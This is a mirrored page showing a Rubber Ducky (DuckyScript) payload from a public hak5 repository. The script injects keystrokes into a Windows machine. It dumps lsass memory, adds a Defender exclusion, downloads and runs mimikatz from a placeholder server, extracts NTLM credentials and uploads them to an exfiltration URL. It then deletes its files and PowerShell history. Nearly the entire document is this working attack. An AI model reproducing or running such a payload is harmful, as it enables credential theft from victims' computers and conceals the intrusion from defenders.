Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/ExfiltrateWindowsCredentials/NetworkMedium/payload.txt
2971 views
1
REM Title: DuckyScript payload for data exfiltration over a network medium

2
REM Author: jakobfriedl

3
ATTACKMODE HID

4


5
REM OS Detection to ensure the target is Windows

6
EXTENSION PASSIVE_WINDOWS_DETECT

7
    REM VERSION 1.1

8
    REM AUTHOR: Korben

9


10
    REM CONFIGURATION:

11
    DEFINE #MAX_WAIT 150

12
    DEFINE #CHECK_INTERVAL 20

13
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2

14
    DEFINE #NOT_WINDOWS 7

15


16
    $_OS = #NOT_WINDOWS

17


18
    VAR $MAX_TRIES = #MAX_WAIT

19
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

20
        DELAY #CHECK_INTERVAL

21
        $MAX_TRIES = ($MAX_TRIES - 1)

22
    END_WHILE

23
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN

24
        $_OS = WINDOWS

25
    END_IF

26
END_EXTENSION

27


28
IF ($_OS != WINDOWS)                                                                                                                 

29
    LED_R                                                                                                                                       

30
    STOP_PAYLOAD 

31
END_IF

32


33
REM Define the URL of the server hosting the mimikatz executable

34
DEFINE #SERVER_URL http://XXX.XXX.XXX.XXX

35


36
REM Define the URL of the webserver to exfiltrate the credentials to

37
DEFINE #EXFIL_URL http://XXX.XXX.XXX.XXX

38


39
DELAY 1000

40


41
REM Delete existing dump file

42
GUI r

43
DELAY 200

44
STRINGLN powershell "rm $env:TEMP\lsass.DMP"

45
DELAY 200

46


47
REM Create lsass-dump using the TaskManager

48
GUI r

49
DELAY 200

50
STRING taskmgr

51
CTRL-SHIFT ENTER

52
DELAY 500

53
ALT y

54
DELAY 500

55
DOWNARROW

56
DELAY 1000

57
STRING lsass

58
DELAY 500

59
SHIFT F10

60
$I = 0

61
WHILE ($I < 5) 

62
    UPARROW

63
    $I = ($I + 1)

64
END_WHILE

65
ENTER

66
DELAY 500

67
ENTER

68
ALT F4

69


70
REM Add exclusion path to the Windows Defender settings

71
GUI r

72
DELAY 200

73
STRING powershell.exe

74
CTRL-SHIFT ENTER

75
DELAY 500

76
ALT y

77
DELAY 500

78
STRINGLN if((Get-MpComputerStatus).RealTimeProtectionEnabled){Set-MpPreference -ExclusionPath $env:TEMP}

79


80
REM Download mimikatz.exe from webserver

81
STRINGLN wget #SERVER_URL/mimikatz.exe -o $env:TEMP\mimikatz.exe

82
DELAY 1000

83


84
REM Execute mimikatz and the necessary commands

85
STRINGLN cd $env:TEMP

86
STRINGLN .\mimikatz.exe "privilege::debug"

87
STRINGLN log exfiltration.log

88
STRINGLN sekurlsa::minidump lsass.DMP

89
STRINGLN sekurlsa::logonpasswords

90
DELAY 5000

91
CTRL c

92
DELAY 500

93


94
REM Format mimikatz-log for exfiltration

95
STRINGLN cat .\exfiltration.log | Select-String -Pattern "NTLM" -Context 2,0  | Get-Unique > credentials.txt

96


97
REM Create zip archive of prepared data

98
DEFINE #archive $env:COMPUTERNAME'-exfiltration-data.zip'

99
STRING Compress-Archive -Force -Path $env:TEMP\exfiltration.log, $env:TEMP\credentials.txt -DestinationPath $env:TEMP\

100
STRINGLN #archive

101
DELAY 500

102


103
REM Exfiltration

104
STRING Invoke-WebRequest -Method PUT -InFile $env:TEMP\

105
STRING #archive

106
SPACE 

107
STRING -Uri #EXFIL_URL

108
STRINGLN #archive

109
DELAY 500

110


111
REM Clean-up

112
REM Remove files

113
STRINGLN rm $env:TEMP\lsass.DMP

114
STRINGLN rm $env:TEMP\mimikatz.exe

115
STRINGLN rm $env:TEMP\exfiltration.log

116
STRINGLN rm $env:TEMP\credentials.txt

117
STRINGLN rm $env:TEMP\data.zip

118
REM Reset configurations

119
STRINGLN Remove-MpPreference -ExclusionPath $env:TEMP

120
REM Delete Powershell history

121
STRINGLN rm (Get-PSReadLineOption).HistorySavePath

122